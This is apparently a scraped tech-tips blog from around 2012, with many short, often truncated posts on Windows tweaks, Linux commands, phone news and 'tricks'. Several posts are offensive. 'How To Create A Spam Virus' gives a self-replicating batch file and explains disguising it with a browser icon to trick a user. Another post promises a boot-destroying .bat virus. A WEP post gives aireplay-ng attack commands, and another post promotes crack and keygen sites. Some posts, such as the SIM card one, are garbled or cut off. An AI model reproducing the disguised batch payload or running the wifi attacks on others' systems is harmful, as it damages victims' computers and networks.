Xiaomi Mi4c Leaked To Come With Type-C USB port and Even More Internal Storage

It was earlier reported that Xiaomi Mi4c is going to carry a price of less than $250, which is a steal of a deal considering that you will get a smartphone running a Snapdragon 808 chipset in it.

Windows 10 for phones features revealed

Microsoft showed off a number of new features for Windows 10 on phones today, but in afternoon sessions at the company’s press event. Most of the demonstrations focused on improving the built-in apps and features of Windows Phone, and fixing a lot of the oddities. That includes mail, maps, photos, Skype, and messaging.

Windows 8 and Windows 7 would receive a free upgrade to Windows 10

Once the OS launches later this year, Microsoft announced that all users who are using- Windows 8 and Windows 7 would receive a free upgrade to Windows 10 . With the release of the January Technical Preview, Microsoft is testing one of those systems.

Windows 10 build 9926 installation process

If you are installing the Windows 10 build that was released today, you will notice that the installation screens have been slightly changed or updated since Windows 8 and even over 9879, to a small degree. Since we know you don't install Windows builds frequently, we snapped some screens while installing the OS that you can see at the bottom of the post.

Whatsapp launches the Web client

Today WhatsApp announced a web client that will enable users to use the world’s most popular mobile IM client on their PC and Macs. But this web Client works only in the Google Chrome browser.

Sunday 30 September 2012

Keyboard Shotcuts


keyboard shortcuts
CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
DELETE (Delete)
SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)

How To Get Windows 8 Interface Instantly On Your Windows 7 PC


Windows 8 is yet to release, but buzz has started regarding it. We bring you an opportunity to try its desktop interface. Note that, It’s not the OS. It is just an application that gives your PC a look that resembles with widget-based look of Windows 8. You should have Windows 7 and .Net framework v4 installed on
your PC. Now, follow the steps below:

Friday 28 September 2012

How to sign up multiple times to a website with one/same gmail account


Sometimes you want to create multiple accounts in a website but you require different email id. In this very easy and simlple trick i'll share how you can create multiple accounts in some websites with only one gmail account. The basic logic behind the trick is some websites treats .(dot) as different email id but gmail treats them same.because gmail ignores .(dot) from your email id
for examle:-

examplemyid@gmail.com
example.myid@gmail.com
example.my.id@gmail.com
example.my.i.d@gmail.com


if i'll use any of these email id's to sign in to my gmail account gmail will let me in to the account examplemyid@gmail.com because gmail ignores .'s(dots) in your id. but many websites(not facebook)treats them as different id and you can access multiple accounts in a website through one email id.

This trick is only for gmail accounts and will not work on yahoo and hotmail etc.

Wednesday 26 September 2012

Cloud increasing share in security spend




According to a report by AMI Partners released Wednesday, overall global spending on security products and services reached US$19 billion in 2011. It added that spending by small and midsize businesses (SMBs) would increase at a compound annual growth rate of over 10 percent between 2011 and 2016.

Sunday 23 September 2012

Facebook Account Temporarily Locked or blocked::


 Facebook Account Temporarily
Locked or blocked:::....
Isn't frustrating????

Reason:

A) May be Facebook making an
improvement in the database and
the account get "Locked" are
stored on. During this time,it may
not be able to gain access to the
account. It may last for an hours.
If this doesn't work, try
submitting Facebook form.

B) May be Facebook has detected
suspicious activity and has
temporarily suspended due to
security precaution.

C) Randomly adding large number
of friends and sending
continuously message to your
friend list. Due to which unknown
friend has detected as a spam or
reported abuse. If in a bulk large
number of people report abuse or
spam then it may also get locked
temporarily.

FreeBSD add a user to group


You need to use pw command. The pw utility is a command-line based editor for the system user and group files, allowing the superuser an easy to use and standardized way of adding, modifying and removing users and groups. First login as the root using su or sudo command.
Task: Add existing user to group
You would like to add existing user tom to secondary group called ftpusers. Type the command as follows:
# pw usermod tom -G ftpusers

Saturday 22 September 2012

Bogus Facebook apps spreading Android malware


Third-party Android markets have traditionally been the main source of infection since the Android boom, as they are less strict than the genuine Play when it comes to bouncing malware.

Today Gmanetwork reports that, Users of mobile devices running Google’s Android OS were warned over the weekend against a new fake app of the social networking giant that may lead to potential Android malware. These duplicated applications have the same behavior as their original

Howto Crack pdf File Password


If you want to crack pdf file passwords use pdfcrack.PDFCrack is a GNU/Linux (other POSIXcompatible
systems should work too) tool for recovering passwords and content from PDF-files. It is small, command line driven without external dependencies. The application is Open Source (GPL).
pdfcrack Features
Supports the standard security handler (revision 2 and 3) on all known PDF-versions Supports cracking both owner and userpasswords. Both wordlists and bruteforcing the password is supported  Simple  ermutations (currently only trying first character as Upper Case) Save/Load a running job Simple  enchmarking Optimised search for owner-password when user-password is known

Install pdfcrack in Ubuntu

How To Create Your Own RUN Commands


If you had a belief, that RUN commands are only for predefined OS related applications; then it’s past now. Because, now we can also create user defined RUN commands so that we can run any application installed or present inside the computer. This will not only make you easily access the said application but also it will save your precious time. It’s very much easy too..

How To Download Torrent At Faster Speed


Trick 1 : based on torrent client
First tip to speed torrent download is to use Vuze instead of other torrent clients. However if you still insist on
using other torrent forms here are some tips that might give you a boost in enhancing your download
speed….

Trick 2 : based on upload and download rates

A Basic Knowledge About The Sim Card




This Is an Basic Knowledge About The Sim Card Wich U will Not Get in Google Also And Many People Doesn't Know This  So I am Sharing Wit U guys Sim Cards Are Of 4 Types..Named As Below
SIM
SIM
H1, H2, H3, H4
H ka Matlab Nai Malum
H1= U Will Get Noraml Network On

Thursday 20 September 2012

Ubuntu Tip:How to Connect/disconnect VPN from the command line


This tutorial will explain How to Connect/disconnect VPN from the command line
If you want to interact with NetworkManager from the command line you can use the "nmcli" command.
You can list all NM connections using the following command
nmcli con
You can start connection (wifi, vpn, etc) using the following command
nmcli con up id ConnectionName

Understanding /etc/shadow file used under Linux or UNIX


/etc/shadow file stores actual password in encrypted format for user's account with additional
properties related to user password i.e. it stores secure user account information. All fields are
separated by a colon (:) symbol. It contains one entry per line for each user listed in /etc/passwd
file Generally, shadow file entry looks as follows (click to enlarge image):
/etc/shadow file fields
1. User name : It is your login name
2. Password: It your encrypted password. The password should be minimum 6-8 characters long including special characters/digits

Wednesday 19 September 2012

Permanent Solution To Delete Newfolder.exe Virus-(Manually)


Often people do complain regarding the New folder virus or Newfolder.exe. This newfolder.exe is an executable file that starts a malicious process which launches certain parasite components or runs a destructive payload. Even if the newfolder.exe file does nothing suspicious, its presence indicates that your
computer is infected with a particular threat.

The original name of the virus is: Iddono. If this virus enters into your computer, it will run into several system processes making several copies of it, occupies space from both RAM and Hard disk and thereby increase the system load. This virus is indeed very difficult to eliminate manually, but here is a solution for
removal of the deadly virus.

Manual Solutions:

How To: UNIX Add A User To A Group




Q. How do I add a user to a group under Sun Solaris UNIX operating system from a shell
prompt or command line?

A.. You can useadd command to administer a new user login on the UNIX system. Solaris UNIX
/ HP-UX UNIX uses /etc/passwd, /etc/shadow and /etc/group files to store user information.

Following information is compatible with the Solaris, AIX and HP-UX UNIX operating systems.

How To Create A Spam Virus


In my previous post How to create a computer virus? I gave a little information regarding methods to create viruses using different programming languages. But
let’s face it just creating a virus isn’t going to satisfy high class prankster. So here’s a new one coming your way. But as usual I should caution you trying this can
cause serious damage.
In this new prank we’ll create a spam virus in the computer and make the user believe it’s a very accessible file so that he opens it and falls prey to our prank.
Step-1 Right click on the desktop
Step-2 Go to new and create a “text document”
Step-3 Open the text document and type the following codes
@echo off
Copy 100% spam.bat
Start spam.bat
Step-4 then save the file as spam.bat
Step-5 now create a shortcut to the file spam.bat
Step-6 go to the properties of the newly created shortcut file
Step-7 click on change icon
Step-8 now select the most used type file by the user like icons of internet explorer or Mozilla firefox etc
Step-9 click on OK
Step-10 now rename the shortcut file as internet explorer or Mozilla firefox depending on the icon type you selected….

Wifi Securiy: WEP


Wired Equivalent Privacy (WEP) is a security algorithm for IEEE 802.11 wireless networks in 1999. Recognizable by the key of 10 or 26 hexadecimal digits (or what is the
same 5 or 13 characters, 2 hex -> 1 byte each).
Two important elements to know are: IVs (initialization vectors), and Data packets.
Obtaining the password is relatively easy (if it is short enough) because the more data packets we have the easier is for algorithms using some heuristics to guess he password
and finally find it.
Normally having 120,000 data packets is enough to crack the password of WEP protected wifi networks. To accelerate the hacking process it is useful to join the network,
capture some packets and generate traffic artificially.
First check if the MAC filtering is enabled (authenticate and associate to the network):
sudo aireplay-ng -1 0 -e target_essid -a target_bssid -h my_MAC the_interface
You can also do that with “keep-alive”: -1 6000 -o 1 -q 10 (re-authenticate every 6000 secs, and send keep-alive every 10s)

BitTorrent study finds most file-sharers are monitored.


Anyone using file-sharing service BitTorrent to download the latest film or music
release without paying is likely to be monitored, UK-based researchers suggest.
A Birmingham University study indicates that an illegal file-sharer downloading
popular content would be logged by a monitoring firm within three hours.
The team said it was "surprised" by the scale of the monitoring.
Copyright holders could use the data to crack down on illegal downloads.
The three-year research was carried out by a team of computer scientists who
developed software that acted like a BitTorrent file-sharing client and logged all the
connections made to it.

Sunday 16 September 2012

Linux setup shared directory


Sharing a directory among users in same group is one of the essential tasks. You need to use chmod command and add user to appropriate group. To make idea clear here is an scenario:

  • /home/myproj : is shared directory
  • usr1, usr2, ... usrN : would like to work and share files in /home/myproj directory
  • padmin : Main project administrator user


Saturday 15 September 2012

WIFI HACKING Commands in Backtrack/linux

Wireless networks are all around and people often needs to keep their networks private and secure. There is a set of best practices to do so and a good way of testing how secure our networks are (i.e., WLAN, Wifi) is to carry out wifi auctions.
Normally, networks are protected using an encryption technology which uses a password chosen by the network owner.
In this article, we will try to obtain the passwords of our networks as if we were an external attacker to verify whether our networks are secure enough or not.
Basically, there are 3 types of attacks:

Brute force: check all the possible passwords (not recommended for long passwords > 10 chars). Checking 1000 passwords per second, it will take 1 day in the worst case to decode an 8 digit password.
Dictionary: check only some character combinations. You can only check the most common combinations and save time.
Statistical: If it is possible (like in WEP encryption) you can guess the password from the data packets and IVs you capture using some heuristics.

CRACKING LINUX FROM INSIDE

We all knows what linux os is. It is a biggest platform on which a developer develops there software and it is an freeware.This tweak allows an user to crack the linux from inside. . Be carefull when you are cracking your linux os .

THE LIST OF FREE CRACK AND KEYGENS SITEs


THE LIST OF FREE CRACK AND KEYGENS SITES THAT ARE SAFE FOR U.


Are you looking for a serial key and can’t find it no matter how much you try? Well, if that is driving you crazy, a visit to the next websites might just put an end to that. Here is the list of free crack and keygen sites that are safe to use.

Wednesday 12 September 2012

Create A Hidden User Account



This tweak allows an account that is normally displayed on the Welcome screen to be hidden from view. To log on using the account it's necessary to use the Log On To Windows dialog box similar to the one in
Windows 2000.

[Start] --> [Run] --> Type Regedit --> Press Enter --> then
Navigate to following key.

Make Your Computer to Never Reboot Till You Format It Up.


Basically this is a virus you program on notepad and save it as .bat file to delete the files needed
for booting up a pc.
Please follow the steps to create this virus:..
Open up notepad and copy , paste the code below. Save it as a .bat file.

Wednesday 5 September 2012

Make Your Computer Speak When you Log On


It’s a simple trick to amaze your friends.When you Log On infront of them.
Yeah a trick to make your Computer Welcome you on Start Up.
Lets Do It:

Open Notepad

Tuesday 4 September 2012

To trace the ip address of the various computer in the internet (on cmd)


If u want to see the ip address of those who where using the same url which u r using at the same time in an WLAN network then use this cmd.

Step1> open “run”.

How To Speed Up Internet with Open DNS [Windows7]


In this article i am going to explain "How To Speed Up Internet with Open DNS" in Windows7.
Without the help of any software.

lets see how to setup OpenDNS for your Computer

First Go to Control Panel, then select “Network and Internet”.

Select “Network and Sharing Center”.

Select “Change adapter settings

Then Right click on your current internet connection and choose “Properties

Saturday 1 September 2012

How To Clear Pagefile on Shutdown


As an added security precaution it is possible to clear all data that has been written to the page file so it cannot be retrieved. The downside to this tweak is that it may substantially increase  shutdown time depending on the amount of data in the page file.

[Start] --> [Run] --> Type Regedit --> Press Enter --> then
Navigate to following key.

Registry Key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\
Session Manager\Memory Management

Conceal Hidden Devices in Device Manager


When accessing Device Manager there may be hidden devices that are not displayed.


[Start] [Run] [Regedit]

Make Your Computer to Never Reboot Till You Format It Up.




Basically this is a virus you program on notepad and save it as .bat file to delete the files needed for booting up a pc.
Please follow the steps to create this virus:..








Open up notepad and copy , paste the code below. Save it as a .bat file.

Clean your RAM using Notepad!!


you may recognize that your system gets slower and slower while playing and working a lot with your pc. That's cause your RAM is full of remaining progress pieces which you don't need any more.

To clean up your ram:
Create a new text file and name it as "ramcleaner" or anything whatever you like..

Enable/Disable Local Group Policy Objects


In a non-networked environment (or in a networked environment that does not have a domain controller), the local Group Policy object's settings are more important, because they are not overwritten by other
Group Policy objects. You can open the Group Policy snap-in to edit the local Group Policy object that is stored on your local computer.
 Click Group Policy to open the local Group Policy object. This tweak allows
you to disable Local Group Policy Objects.

[Start] --> [Run] --> Type Regedit --> Press Enter --> then

Navigate to following key.

Registry Key:
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Wind
ows\System

[ In most cases, this registry key is not present and will
need to be created ]